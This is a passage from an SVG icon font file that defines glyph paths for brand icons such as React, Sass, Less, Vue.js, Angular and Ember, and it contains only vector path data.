c0 -2.60059 -1.40039 -5.10059 -3.7002 -6.40039zM559 229l11.7998 6.7998c0.400391 0.299805 1 0.299805 1.40039 0l11.7998 -6.7998c0.400391 -0.200195 0.700195 -0.700195 0.700195 -1.2002v-13.5996c0 -0.5 -0.299805 -0.900391 -0.700195 -1.2002l-11.7998 -6.7998
c-0.400391 -0.299805 -1 -0.299805 -1.40039 0l-11.7998 6.7998c-0.400391 0.200195 -0.700195 0.700195 -0.700195 1.2002v13.5996c0 0.5 0.299805 0.900391 0.700195 1.2002zM304.8 185.5c0 -0.599609 -0.0996094 -1.2002 -0.200195 -1.7002
c-0.5 -2 -1.7998 -3.7002 -3.59961 -4.7002l-61 -35.1992c-2.2002 -1.30078 -5 -1.40039 -7.40039 0l-61.1992 35.1992c-2.10059 1.2002 -4 3.60059 -4 6.40039v70.4004c0 2.69922 1.59961 5.09961 3.89941 6.39941l61.1006 35.2002
c2.39941 1.40039 5.2998 1.2002 7.39941 0l61.1006 -35.2002c2.2998 -1.2998 3.89941 -3.7998 3.89941 -6.39941v-70.4004zM230.5 310.4l-0.799805 -0.5h1.09961zM306.7 180.2l-0.400391 0.700195v-0.900391z" />
    <glyph glyph-name="osi" unicode="&#xf41a;" horiz-adv-x="495" 
d="M0 188.8c2.2998 135.8 97.4004 232.4 213.8 248.101c138.8 18.5996 255.601 -75.8008 278 -201.101c21.2998 -118.8 -44 -230 -151.6 -274c-9.2998 -3.7998 -14.4004 -1.7002 -18 7.7002c-17.7998 46.2998 -35.6006 92.7002 -53.4004 139
c-3.09961 8.09961 -1 13.2002 7 16.7998c24.2002 11 39.2998 29.4004 43.2998 55.7998c6.40039 42.4004 -24.5 78.7002 -64.5 82.2002c-39 3.40039 -71.7998 -23.7002 -77.5 -59.7002c-5.19922 -33 11.1006 -63.6992 41.9004 -77.6992
c9.59961 -4.40039 11.5 -8.60059 7.7998 -18.4004c-17.8994 -46.5996 -35.7998 -93.2002 -53.7002 -139.9c-2.59961 -6.89941 -8.2998 -9.2998 -15.5 -6.5c-52.5996 20.3008 -101.399 61 -130.8 119c-24.8994 49.2002 -25.2002 87.7002 -26.7998 108.7zM20.9004 190.7
c0.399414 -6.60059 0.599609 -14.2998 1.2998 -22.1006c6.2998 -71.8994 49.5996 -143.5 131 -183.1c3.2002 -1.5 4.39941 -0.799805 5.59961 2.2998c14.9004 39.1006 29.9004 78.2002 45 117.3c1.2998 3.30078 0.600586 4.80078 -2.39941 6.7002
c-31.6006 19.9004 -47.3008 48.5 -45.6006 86c1 21.6006 9.2998 40.5 23.7998 56.2998c30 32.7002 77 39.8008 115.5 17.6006c31.9004 -18.4004 49.5 -53.7998 45.2002 -90.4004c-3.59961 -30.5996 -19.2998 -53.8994 -45.7002 -69.7998
c-2.69922 -1.59961 -3.5 -2.90039 -2.2998 -6c15.2002 -39.2002 30.2002 -78.4004 45.2002 -117.7c1.2002 -3.09961 2.40039 -3.7998 5.59961 -2.2998c35.5 16.5996 65.2002 40.2998 88.1006 72c34.7998 48.2002 49.0996 101.9 42.2998 161
c-13.7002 117.5 -119.4 214.8 -255.5 198c-106.1 -13 -195.3 -102.5 -197.1 -225.8z" />
    <glyph glyph-name="react" unicode="&#xf41b;" horiz-adv-x="512" 
d="M418.2 270.8c54.3994 -18.7002 93.7998 -48.0996 93.7998 -78.3994c0 -31.7002 -41.7998 -62.6006 -99.5 -81.7002c-3.09961 -1 -6.2002 -2 -9.40039 -2.90039c1.10059 -4.59961 2.10059 -9.09961 3 -13.5c11.4004 -57.5996 2.60059 -104.899 -24.3994 -120.5
c-26.1006 -15.0996 -68.4004 -0.200195 -111.2 36.6006c-4.59961 4 -9.2002 8.09961 -13.5996 12.3994c-3.5 -3.39941 -7 -6.59961 -10.5 -9.7002c-44.2002 -38.6992 -89.6006 -54.6992 -116.601 -39.0996c-26.2002 15.0996 -34.3994 59.0996 -23.8994 114.6
c1.19922 6.10059 2.5 12 4 18c-4.60059 1.30078 -9.10059 2.80078 -13.6006 4.30078c-55.5 19 -96.2998 50.2998 -96.2998 81.5c0 30.1992 38.2998 59.3994 91.7002 77.8994c5.89941 2.10059 12.2002 4.10059 18.5996 5.90039
c-1.39941 5.59961 -2.59961 11.0996 -3.7002 16.7002c-11 56.3994 -3.19922 101.5 23 116.699c27.3008 15.9004 72.9004 -1.09961 118.4 -41.5c2.7998 -2.5 5.59961 -5.09961 8.2998 -7.69922c4 3.89941 8.2002 7.7998 12.5 11.5
c43.4004 37.7998 86.2998 53.5 112.601 38.3994c27.2998 -15.7998 35.3994 -63.7002 23.0996 -123.3c-0.799805 -3.7002 -1.59961 -7.40039 -2.5 -11.0996c5.40039 -1.60059 10.7998 -3.30078 16.2002 -5.10059zM282.9 355.7c-4 -3.5 -7.80078 -7 -11.7002 -10.7002
c15.3994 -16.7002 29.5996 -34.5 42.5996 -53.0996c22.6006 -2 45.1006 -5.60059 67.2998 -10.6006c0.900391 3.2998 1.60059 6.60059 2.30078 10c10.5996 51.5 4.09961 90.7002 -12.8008 100.4c-15.7998 9.09961 -50.5 -3.60059 -87.6992 -36zM167.2 140.5
c-5 8.59961 -9.7002 17.2998 -14.2998 26.0996c-6.40039 -15.1992 -11.9004 -30.0996 -16.3008 -44.5c15.3008 -3.2998 30.8008 -5.7998 46.4004 -7.5c-5.5 8.5 -10.7002 17.2002 -15.7998 25.9004zM136.9 260.8c4.39941 -14.0996 9.69922 -28.7002 16 -43.5996
c4.5 8.7998 9.2998 17.5 14.1992 26c4.90039 8.59961 10.1006 17.0996 15.4004 25.3994c-15.9004 -2 -31.2002 -4.59961 -45.5996 -7.7998zM164.3 191.9c6.7002 -13.8008 13.7998 -27.3008 21.5 -40.6006s15.9004 -26.2998 24.6006 -39
c14.6992 -0.899414 29.8994 -1.39941 45.5996 -1.39941s31.2002 0.5 46.0996 1.59961c8.5 12.7998 16.6006 25.7002 24.2002 39c7.7002 13.4004 14.9004 27 21.6006 40.7998c-6.80078 13.7002 -14 27.2002 -21.7002 40.4004s-15.7998 26.0996 -24.2998 38.7002
c-14.9004 1.09961 -30.3008 1.69922 -45.9004 1.69922s-30.9004 -0.599609 -45.9004 -1.69922c-8.59961 -12.7002 -16.7998 -25.6006 -24.3994 -38.9004c-7.60059 -13.2998 -14.7998 -26.7998 -21.4004 -40.5996zM344.9 140.7c-5 -8.60059 -10.1006 -17.2002 -15.5 -25.6006
c15.7998 1.80078 31.5 4.5 47 8c-4.90039 15.1006 -10.5 29.8008 -16.9004 44.3008c-4.7002 -9 -9.5 -17.9004 -14.5996 -26.7002zM359.3 217.2c6.10059 14.2002 11.5 28.5996 16.1006 43.3994c-14.4004 3.30078 -29.8008 6 -45.9004 8
c5.2998 -8.2998 10.4004 -16.6992 15.2998 -25.1992c5 -8.60059 9.7998 -17.4004 14.5 -26.2002zM256.2 329.7c-10 -10.9004 -20.1006 -22.9004 -29.9004 -35.7998c19.7998 0.899414 39.7002 0.899414 59.5 0c-9.2002 12.3994 -19.0996 24.3994 -29.5996 35.7998zM140.2 391
c-15.7998 -9.09961 -22 -45.5996 -12.6006 -94c1.10059 -5.2002 2.2002 -10.4004 3.5 -15.5c22.2002 4.90039 44.6006 8.40039 67.2002 10.4004c13.1006 18.5996 27.4004 36.3994 42.9004 53.0996c-2.60059 2.40039 -5.10059 4.7998 -7.60059 7
c-39.2998 34.7998 -76.5996 48.7998 -93.3994 39zM115.7 127.4c6.89941 22 15.2002 43.5996 24.7998 64.5c-9.5 20.5996 -17.7002 41.8994 -24.5 63.5996c-5.7998 -1.7002 -11.5996 -3.5 -17.2998 -5.5c-45.6006 -15.9004 -77.2002 -39.2998 -77.2002 -57.5996
c1.90039 -12.1006 8.7002 -22.9004 18.7998 -29.9004c17.5 -13.9004 41.7002 -24.5 63 -31.2002c4.10059 -1.39941 8.2002 -2.7002 12.4004 -3.89941zM232.3 29.4004c3.2002 2.7998 6.40039 5.7998 9.60059 8.89941c-15.5 16.7998 -30 34.7002 -43.2002 53.4004
c-22.9004 1.7002 -45.5 5 -67.9004 9.7998c-1.39941 -5.5 -2.59961 -11.0996 -3.7002 -16.7002c-9 -47.5 -2.39941 -82.7998 13.5 -92c11.4004 -4.5 24.2002 -4 35.3008 1.2998c20.7998 8.2002 39.8994 20.2002 56.3994 35.3008zM256.8 53.7002
c10.5 11.5996 20.4004 23.7002 29.6006 36.3994c-10 -0.5 -20.1006 -0.699219 -30.4004 -0.699219c-10 0 -19.9004 0.199219 -29.5 0.599609c9.90039 -13.0996 20.0996 -25.2998 30.2998 -36.2998zM387.5 23.7002c3.2002 22.2002 2.40039 44.7002 -2.5 66.2998
c-0.799805 4 -1.7002 8.09961 -2.7002 12.2002c-22.5 -5.10059 -45.2998 -8.60059 -68.2002 -10.5c-12.7998 -18.7998 -26.8994 -36.7002 -42.1992 -53.6006c4.2998 -4 8.5 -7.89941 12.6992 -11.5c36.6006 -31.3994 70.5 -43.3994 86.4004 -34.1992
c9.59961 7.69922 15.5996 19.0996 16.5 31.2998zM405.7 131.2c49.8994 16.5 84.7998 41.7998 84.7998 61.3994c0 18.2002 -32.7002 42 -79.2998 58c-4.7998 1.60059 -9.7998 3.2002 -15 4.7002c-6.7998 -21.5 -14.9004 -42.5 -24.5 -62.8994
c9.89941 -20.7002 18.5 -42 25.5 -63.8008c2.89941 0.800781 5.7002 1.7002 8.5 2.60059zM256 146.2c-25.2998 0 -45.7998 20.5 -45.7998 45.7998s20.5 45.7998 45.7998 45.7998s45.7998 -20.5 45.7998 -45.7998s-20.5 -45.7998 -45.7998 -45.7998z" />
    <glyph glyph-name="autoprefixer" unicode="&#xf41c;" horiz-adv-x="640" 
d="M318.4 432l164.1 -480h-77.5l-25.2002 81.4004h-119.5l-25.3994 -81.4004h-77.5zM278.1 90.0996h83.6006l-40.9004 130.4h-1.5zM640 43l-158.5 -9.5l-19.4004 56.5l167.9 -15.5996zM177.9 90l-19.4004 -56.4004l-158.5 9.40039l10 31.2998z" />
    <glyph glyph-name="less" unicode="&#xf41d;" horiz-adv-x="640" 
d="M612.7 229c0 -11 6.7998 -22.5996 27.2998 -23.2998v-27.2998c-20.5 -1 -27.2998 -12.6006 -27.2998 -23.6006c0 -20.3994 3.2002 -32 3.2002 -54.5996c0 -34.2002 -12.7002 -45.2002 -40.5 -45.2002h-20.5v25.2002h6.2998v0.5c13.5996 0 17.2998 4.7002 17.2998 22.5996
c0 17.2998 -1.59961 32.6006 -1.59961 51.5c0 24.2002 7.7998 33.6006 23.5996 37.2998v1.60059c-15.7002 3.7002 -23.5996 13.0996 -23.5996 37.2998c0 18.9004 1.59961 35.2002 1.59961 51.5c0 17.4004 -3.09961 22.0996 -17.2998 22.0996h-6.2998v24.2002h20.5
c27.8994 0 40.5 -11 40.5 -45.2002c0 -22 -3.2002 -34.0996 -3.2002 -54.5996zM507.1 197c20.5 -6.7998 43 -18.9004 43 -47.7998c0 -28.9004 -22.5996 -51 -64.5996 -51c-20 0 -44.0996 9 -59.9004 22.0996l21 30.5c14.2002 -11 27.4004 -16.2998 40.5 -16.2998
c14.2002 0 20.5 5.2002 20.5 13.0996c0 10.5 -15.7998 15.8008 -32.0996 22.1006c-18.9004 7.2998 -41.5 20.5 -41.5 46.2002c0 28.8994 24.2002 49.3994 59.9004 49.3994c24.1992 0 42.0996 -10.5 55.1992 -20.5l-21 -27.7998c-11.5 8.40039 -22 13.0996 -33.5996 13.0996
s-17.9004 -4.69922 -17.9004 -12.5996c0 -10.5 14.7002 -14.2002 30.5 -20.5zM148.2 137.6c1.59961 0 3.09961 0 6.2002 0.800781l5.2998 -34.2002c-5.7002 -2.10059 -13.6006 -3.7002 -23.6006 -3.7002c-32.0996 0 -43.0996 21 -43.0996 53.0996v150.801h-14.0996
c-13.6006 0 -17.3008 -4.80078 -17.3008 -22.1006s1.60059 -32.5996 1.60059 -51.5c0 -24.2002 -7.7998 -33.5996 -23.6006 -37.2998v-1.59961c15.7002 -3.7002 23.6006 -13.1006 23.6006 -37.3008c0 -19.3994 -1.60059 -34.1992 -1.60059 -51.5
c0 -17.2998 4.2002 -22.5996 17.3008 -22.5996h6.2998v-24.2002h-20.5c-27.9004 0 -40.5 11 -40.5 45.2002c0 22.5996 3.2002 34.2002 3.2002 53.5996c0 11 -6.80078 22.6006 -27.3008 23.1006v27.2998c20.5 1 27.3008 12.5996 27.3008 23.5996
c0 19.4004 -3.2002 32 -3.2002 54.6006c0 34.2002 12.5996 45.2002 41 45.2002h74.5996v-178.2c0 -9.90039 4.7002 -13.1006 8.40039 -13.1006zM379.9 197c20.5 -6.7998 43.0996 -18.9004 43 -47.7998c0 -28.9004 -22.6006 -51 -64.6006 -51
c-20 0 -44.0996 9 -59.8994 22.0996l20.5 30.5c14.1992 -11 27.3994 -16.2998 40.5 -16.2998c14.1992 0 20.5 5.2002 20.5 13.0996c0 10.5 -15.8008 15.8008 -32.1006 22.1006c-18.8994 7.2998 -41.5 20.5 -41.5 46.2002c0 28.8994 24.2002 49.3994 59.9004 49.3994
c24.2002 0 42.0996 -10.5 55.2002 -20.5l-21 -27.7998c-11.5 8.40039 -22 13.0996 -33.6006 13.0996c-11.5996 0 -17.8994 -4.69922 -17.8994 -12.5996c0 -10.5 14.6992 -14.2002 31 -20.5zM224.9 265.8c44.0996 0 67.2998 -33.0996 66.6992 -75.7002
c0 -8.39941 -1.09961 -15.6992 -1.59961 -19.3994h-95.2002c4.2002 -24.2002 20.5 -34.2002 41.5 -34.2002c11.6006 0 22.6006 3.2002 34.2002 10l15.7998 -27.7998c-16.2998 -11.1006 -37.2998 -17.9004 -56.2002 -17.9004c-45.0996 0 -79.2998 30.5 -79.2998 82.5
c-1 50.4004 35.7002 82.5 74.1006 82.5zM194.9 199.6h56.7998c0 17.9004 -7.40039 31 -26.2998 31c-14.7002 0 -27.3008 -10 -30.5 -31z" />
    <glyph glyph-name="sass" unicode="&#xf41e;" horiz-adv-x="640" 
d="M301.9 69.0996c-0.300781 -0.599609 -0.600586 -1.09961 0 0zM551.1 156.1c57.9004 0.300781 90.6006 -37.0996 89 -71.0996c-1.09961 -26.9004 -25.6992 -37.9004 -30.2998 -38.7002c-3.2998 -0.599609 -5.09961 -0.700195 -5.59961 1.90039
c-0.299805 1.7998 0.899414 2.7002 4.7998 5.09961c3.90039 2.40039 15.5996 10.4004 17.7002 25c2.09961 14.5 -8.7998 49.2998 -64.5 55.7998c-26 3 -46.4004 -0.599609 -62.1006 -7.19922c2.90039 -7.60059 5.10059 -15.5 5.40039 -23.4004
c0.799805 -17.5 -11.2998 -30.4004 -23.7998 -39.5996c-7.2998 -5.40039 -15.1006 -8.90039 -21.6006 -11.1006c-5.19922 -2.2002 -12.1992 -4.5 -17.0996 -3.5c-10.9004 2.2002 -16.7002 11.7998 -9.2998 33.1006c4 11.5 15.5 29 34.0996 44.0996
c-4.2998 8.7002 -9 17.5996 -11.3994 25.7002c-4.80078 16.0996 -6.2002 25.7998 -6.2002 25.7998s-15.2998 -31.7002 -35.1006 -60.5996c-1.09961 -1.7002 -2.2998 -3.40039 -3.39941 -5c3.7998 -9 6.89941 -18.6006 7.2998 -28.2002
c0.700195 -17.4004 -6.90039 -30.6006 -19.4004 -39.7998c-6.7998 -4.90039 -14 -8.40039 -20.1992 -10.6006c-3.90039 -1.7998 -12 -4.59961 -23.5 -5.39941c-6.30078 -0.5 -12.3008 -0.100586 -15.7002 2.5c-4.60059 3.39941 -5.2002 7.7998 -2.7998 13.6992
c2 5 17.1992 22.4004 30 37.6006c3.5 4.2002 6.89941 8.5 9.89941 12.5c-0.0996094 0.0996094 -0.0996094 0.200195 -0.0996094 0.200195s2.2998 3 6.09961 8.19922c-4.7002 10.1006 -10.5996 20.5 -13.3994 30c-4.80078 16.1006 -6.2002 25.8008 -6.2002 25.8008
s-15.5 -39.7002 -31.7002 -71.5c-12.5 -24.6006 -20.7998 -39.5 -24.5996 -46v-0.300781s-0.5 -0.899414 -1.5 -2.39941c-0.5 -0.799805 -0.700195 -1.2002 -0.700195 -1.2002v0.0996094c-4.2002 -6.19922 -13.6006 -18.2998 -23 -18.2998
c-25.7002 0 -16.2998 52.2002 -16.2998 52.2002s-7.5 -19.2998 -16 -35.9004c-6.90039 -13.5996 -13.1006 -25 -26.9004 -25c-3.90039 0 -10.2002 0.100586 -15.4004 5c-11.7998 11.2002 -20.8994 39.7002 -19.0996 61.7002c1.5 18.7998 4.40039 31.7998 8.40039 42.6006
c-7.10059 -3.90039 -15.2002 -8.40039 -23.5 -13.3008c-4.30078 -2.5 -8.60059 -5 -12.8008 -7.5c0.100586 -0.299805 0.300781 -0.5 0.400391 -0.799805c10.5996 -20.3994 13.4004 -65.2002 -9.59961 -99.5s-65.8008 -55.2002 -107.601 -43.5996
c-13.3994 3.7998 -33.7998 31.5996 -16.2998 70.3994c15.5 34.2002 77.4004 66.6006 93.7002 74.7002c1.39941 0.799805 2.89941 1.60059 4.5 2.5c-32.5 28.4004 -113.7 66.7998 -125.101 125.7c-3.19922 16.5996 4.60059 56.2998 53.3008 101.9
c41 38.2998 98 67.6992 150.699 86.3994c88.5 31.4004 182 12.9004 196.4 -43.5c14.0996 -55.5 -34 -121.8 -95.7998 -145.6c-55 -21.2998 -100.5 -17.9004 -119.2 -11.7998c-21.2998 7 -33.7998 21 -36.7998 28.8994c-1.2002 3.10059 -3.2998 8.2998 0 10.1006
c2 1.09961 2.7998 0.799805 8.09961 -5.10059c5.10059 -5.59961 25.5 -20.5996 64.2998 -16.2998c101.801 11.4004 163.101 90.5 143.7 133c-13.5 29.7998 -91.8994 43.2002 -189.899 -5.59961c-119.601 -59.6006 -126.101 -108.7 -127.101 -127.4
c-2.7998 -51.2998 63.2998 -78.2998 99.1006 -116.5c0.5 -0.5 0.899414 -1 1.39941 -1.5c6.7002 3.7002 13.7998 7.59961 20.7002 11.4004c18 9.89941 35.0996 19.1992 43 23.5c12.5996 18.2998 38.2002 38.5 56.5996 38.5c29.5 0 19.4004 -42.4004 19.4004 -42.4004
s0.599609 2 1.40039 2c0.799805 0 4.09961 5.5 13.1992 2.2002c9.40039 -3.5 7.2002 -10 7.30078 -10.7002c0.0996094 -1.2998 -11 -38.9004 -15.7002 -63.0996c-2.2002 -11.5 -0.900391 -19.9004 -0.299805 -19.9004c0.899414 0 2.7998 2.90039 4.5 6.09961v0.100586
s1.2998 2.39941 3.5 6.7002c0 0.199219 -0.200195 -0.300781 -0.5 -0.800781c0.199219 0.400391 0.5 0.900391 0.899414 1.7002c2.60059 5 6.2002 12.4004 10.4004 21.6006c8.2002 18.0996 39.5 87.6992 42.0996 95.3994c2.60059 7.7002 4 15.7002 5.2998 19.1006
c1.30078 3.39941 12.4004 6 25.3008 5.89941c12.8994 -0.0996094 14.1992 -5.59961 14.2998 -6.7002c0.0996094 -1.09961 -6.2002 -16.3994 -7.60059 -27.1992c-1.39941 -10.8008 -0.0996094 -16.2002 1.10059 -25.3008c0.799805 -6 4.5 -13.5 8.89941 -22
c13.3008 21.8008 36.8008 63.6006 39.1006 75.3008c1.5 8 4 15.6992 5.2998 19.0996s12.4004 6 25.2998 5.90039c12.9004 -0.100586 14.2002 -5.60059 14.2998 -6.7002c0.100586 -1.10059 -6.19922 -16.4004 -7.59961 -27.2002s-0.0996094 -16.2002 1.09961 -25.2998
c1 -7.7998 7.10059 -18.2002 13 -30.1006c16.2002 8 35.6006 13.4004 58 13.5zM121.8 11.4004c19.4004 21.0996 27.4004 47.8994 19.1006 78.2998c-1 -0.600586 -2 -1.10059 -2.90039 -1.7002c0 0 -0.400391 -0.200195 -1.2002 -0.700195
c-4.7998 -2.89941 -8.7002 -5.2998 -11.3994 -6.89941c-11.8008 -7.40039 -29.6006 -19.4004 -43.4004 -32.4004c-22.7002 -21.4004 -27.4004 -51 -15.5 -57.9004c11.0996 -6.39941 36.9004 1.2002 55.2998 21.3008zM256.2 102.8c4 9.7998 19.7002 53.2998 16.2002 59.2002
c-2.60059 4.5 -13.7002 0.900391 -23.8008 -10.4004c-6.2998 -7 -16.8994 -25 -21.8994 -40.0996c-9.90039 -30 -5.60059 -60.5 1.39941 -62.2998c8.2002 -2.10059 21.7002 37.8994 28.1006 53.5996zM367.2 49.7998c7.7998 4.7998 25 16.9004 25.0996 34.7998
c0 0.600586 -0.0996094 1.10059 -0.0996094 1.60059c-4 -5.2002 -7.7002 -9.90039 -10.9004 -13.9004c-5.5 -6.7998 -19.3994 -21.7002 -19.3994 -21.7002s-2 -1.89941 -1.10059 -2.39941c1.2002 -0.700195 3.7002 0.200195 6.40039 1.59961zM452.8 69.2998
c9.7002 3.5 25.7998 11.9004 25.9004 34.4004c0 3.39941 -0.700195 7 -1.90039 10.7998c-10.3994 -9.2002 -16.3994 -18.7998 -19 -24.5c-6.7002 -14.5996 -7 -19.2998 -5 -20.7002z" />
    <glyph glyph-name="vuejs" unicode="&#xf41f;" 
d="M356.9 383.7h91.0996l-224 -383.7l-224 383.7h176l48 -88.6006l56 88.6006h76.9004zM55.7002 351.7l168.3 -288.2l168.2 288.2h-53.7998l-114.4 -198.2l-114.5 198.2h-53.7998z" />
    <glyph glyph-name="angular" unicode="&#xf420;" horiz-adv-x="415" 
d="M169.7 179.9l38.0996 91.5996l38.1006 -91.5996h-76.2002zM207.8 416l207.8 -74.4004l-31.7998 -275.699l-176 -97.9004l-176 97.9004l-31.7998 275.699zM338 74.2002l-130.2 292.3l-130.1 -292.3h48.7002l26.1992 65.3994h110.601l26.2002 -65.3994h48.5996z" />
    <glyph glyph-name="aviato" unicode="&#xf421;" horiz-adv-x="640" 
d="M107.2 164.5l-19 41.7998h-52.1006l-19 -41.7998h-17.0996l62.2002 131.4l62.2002 -131.4h-17.2002zM62.2002 262.6l-19.6006 -42.5h39.2002zM174.9 160.2l-62.2002 131.399h17.0996l45.1006 -96l45.0996 96h17zM255.5 164.5v127.1h15.5v-127.1h-15.5zM464.6 280.1
v-115.6h-17.2998v115.6h-41.2002v11.5h99.6006v-11.5h-41.1006zM640 229.2c0 -9.2002 -1.7002 -17.7998 -5.09961 -25.7998c-3.40039 -8 -8.2002 -15.1006 -14.2002 -21.1006s-13.1006 -10.7998 -21.1006 -14.2002c-8 -3.39941 -16.5996 -5.09961 -25.7998 -5.09961
s-17.7998 1.7002 -25.7998 5.09961c-8 3.40039 -15.0996 8.2002 -21.0996 14.2002s-10.8008 13 -14.2002 21.1006c-3.40039 8 -5.10059 16.5996 -5.10059 25.7998s1.7002 17.7998 5.10059 25.7998c3.39941 8 8.2002 15.0996 14.2002 21.0996s13 8.40039 21.0996 11.9004
c8 3.40039 16.5996 5.09961 25.7998 5.09961s17.7998 -1.69922 25.7998 -5.09961s15.1006 -5.7998 21.1006 -11.9004c6 -6 10.7002 -13.0996 14.2002 -21.0996c3.39941 -8 5.09961 -16.5996 5.09961 -25.7998zM624.5 229.2c0 7.2998 -1.2998 14 -3.90039 20.2998
c-2.59961 6.2998 -6.19922 11.7002 -10.7998 16.2998c-4.59961 4.60059 -10 8.2002 -16.2002 10.9004c-6.19922 2.7002 -12.7998 4 -19.7998 4s-13.5996 -1.2998 -19.7998 -4s-11.5996 -6.2998 -16.2002 -10.9004c-4.59961 -4.59961 -8.2002 -10 -10.7998 -16.2998
s-3.90039 -13.0996 -3.90039 -20.2998c0 -7.2998 1.30078 -14 3.90039 -20.2998c2.59961 -6.30078 6.2002 -11.7002 10.7998 -16.3008c4.60059 -4.59961 10 -8.19922 16.2002 -10.8994s12.7998 -4 19.7998 -4s13.6006 1.2998 19.7998 4
c6.2002 2.7002 11.6006 6.2998 16.2002 10.8994c4.60059 4.60059 8.2002 10 10.7998 16.3008c2.60059 6.2998 3.90039 13.0996 3.90039 20.2998zM529.7 132.5c6 -0.900391 10.5 -6 10.7002 -12.2998c0 -6.7998 -5.60059 -12.4004 -12.4004 -12.4004
s-12.4004 5.60059 -12.4004 12.4004c0 6.2002 4.60059 11.2998 10.5 12.2002v5.7998l-80.2998 -9v-5.40039c5.60059 -1.09961 9.90039 -6.09961 9.90039 -12.0996c0 -6.7998 -5.60059 -10.2002 -12.4004 -10.2002s-12.3994 3.40039 -12.3994 10.2002
c0 5.89941 4.19922 11 9.89941 12.0996v4.90039l-28.3994 -3.2002v-23.7002h5.89941v-13.7998h-5.89941v6.59961h-5v-6.59961h-5.90039v13.7998h5.90039v23.2002l-38.3008 -4.2998c-8.09961 -11.5 -19 -13.6006 -19 -13.6006l0.100586 -6.69922l5.09961 -0.200195
l0.100586 -12.1006h-4.10059l-0.0996094 5h-5.2002l-0.0996094 -5h-4.10059l0.100586 12.1006l5.09961 0.200195l0.0996094 6.69922s-10.8994 2.2002 -19 13.6006l-38.2998 4.2998v-23.2002h5.90039v-13.7998h-5.90039v6.59961h-5v-6.59961h-5.89941v13.9004h5.89941
v23.6992l-28.3994 3.2002v-4.89941c5.59961 -1.10059 9.89941 -6.10059 9.89941 -12.1006c0 -6.7998 -5.59961 -10.2002 -12.3994 -10.2002c-6.80078 0 -12.4004 3.40039 -12.4004 10.2002c0 5.90039 4.2002 11 9.90039 12.1006v5.39941l-80.3008 9v-5.7998
c5.90039 -0.900391 10.5 -6 10.5 -12.2002c0 -6.7998 -5.59961 -12.3994 -12.3994 -12.3994s-12.4004 5.59961 -12.4004 12.3994c0 6.2002 4.60059 11.2998 10.5 12.2002v6.2998l-88.8994 10l242.899 -13.5c-0.599609 2.2002 -1.09961 4.60059 -1.39941 7.2002
c-0.300781 2.09961 -0.5 4.2002 -0.600586 6.5l-64.7998 8.09961l64.9004 -1.89941c0 0.399414 0 0.799805 0.0996094 1.09961c2.7998 17.2002 25.5 23.7002 25.5 23.7002l1.09961 26.4004h-23.5996l-19 -41.8008h-17.0996l62.1992 131.4l62.2002 -131.4h-17.0996
l-19 41.8008h-23.7998l1.09961 -26.3008s22.7002 -6.5 25.5 -23.6992c0 -0.400391 0.0996094 -0.700195 0.0996094 -1.10059l64.9004 1.90039l-64.7998 -8.10059c-0.100586 -2.2998 -0.299805 -4.5 -0.600586 -6.5c-0.299805 -2.59961 -0.799805 -5 -1.39941 -7.19922
l242.899 13.3994l-88.8994 -10v-6.2998zM328.9 220.1h17.8994l1.7002 40.3008l1.7002 -40.3008h17.8994l-19.5996 42.5z" />
    <glyph glyph-name="ember" unicode="&#xf423;" horiz-adv-x="640" 
d="M639.9 193.4c1.09961 -10.8008 -5.30078 -14.3008 -5.30078 -14.3008s-26.5996 -19.5996 -47 -13.6992c-20.3994 5.89941 -21.5 43.1992 -21.5 43.1992h-1.89941l-20.7002 -57.1992s-8.2998 -27.9004 -20.7002 -22.8008
c-12.3994 5.10059 -12.0996 18.6006 -12.0996 18.6006s-19.2998 -21.2998 -54.7998 -18.6006c-31.1006 2.30078 -41.1006 26.7002 -41.1006 26.7002s-20.7998 -14.3994 -79.0996 -25.8994c-26.1006 -2.90039 -44.6006 12.8994 -44.6006 12.8994
c-2.39941 -2.39941 -18 -10.2002 -18 -10.2002s-22.2998 -10.2998 -30.8994 5.30078c-8.60059 15.5996 -3 63.6992 -3 63.6992h-1.60059s-12.8994 -26.2998 -19.5996 -49.8994c-6.7002 -23.6006 -15 -21.2002 -15 -21.2002s-15.2998 -1.40039 -18.7998 11.4004
c-3.5 12.8994 5.59961 59.6992 5.59961 59.6992l-1.2998 -0.299805s-0.799805 1.40039 -12.5996 -23.5996c-20.1006 -48.9004 -24.9004 -50 -36.5 -47.9004c-11.6006 2.10059 -12.1006 16.7002 -12.1006 16.7002l-15.8994 -8.7998s-38.6006 -16.6006 -58.8008 -1.2998
c-13.3994 10.1992 -18 22.1992 -19.5996 29.6992c0 0 -17 1.80078 -28.0996 6.10059c-11.1006 4.2998 0.0996094 18.2998 0.0996094 18.2998s3.5 5.2998 10 0s18.7998 -2.90039 18.7998 -2.90039c1 8.5 2.5 19.7002 7.7998 31.5c11 24.7002 27.6006 33 41.3008 33.3008
c13.6992 0.199219 23.3994 -3.5 31.6992 -15.3008c18.6006 -45.8994 -49.3994 -69.1992 -49.3994 -69.1992s-1.7998 -12.1006 16.7002 -11.8008c18.5996 0.200195 46.7998 20.4004 46.7998 20.4004c1.2998 15.4004 12.0996 63.5 15 70.7002
c2.89941 7.2002 14.2002 5.89941 14.2002 5.89941s8.89941 1.90039 10.5 -7.5c1.69922 -9.39941 -6.40039 -47.5996 -6.40039 -47.5996l1.2998 -1.59961c0.799805 3.69922 20.4004 36.5 20.4004 36.5s11.2998 19.5996 28.5 18.7998s-0.799805 -53.5 -0.799805 -53.5
l1.2998 -1.60059l1.2998 2.40039c2.2002 5.90039 27.7002 44.5996 27.7002 44.5996s9.59961 11.3008 18.5 8.60059c8.7998 -2.60059 9.39941 -6.7002 9.89941 -14.2002s-7 -52.0996 -7 -52.0996s-4.2998 -29.2002 5.40039 -28.7002s20.2002 10.7002 20.2002 10.7002
s7.5 57.5996 12.5996 105.1c5.10059 47.5 27.1006 79.5 27.1006 79.5s6.5 10 23.5 16.7002c11.1992 4 23.3994 1.2998 29.1992 -23.1006c9.5 -41 -23.2998 -87.8994 -36.8994 -105.199c5.89941 5.7998 15.7998 12.0996 27.2002 5.2998
c40.2998 -25.2998 7.2998 -80.9004 7.2998 -80.9004c11.7998 3.7998 33 18 33 18s0.5 6.10059 0.700195 7.5c7.19922 41.2998 32 56.2002 36.5996 59.7002c4.7998 3.59961 47.0996 19.7998 49 -24s-52.9004 -59.0996 -52.9004 -59.0996s4.80078 -12.6006 25 -9.40039
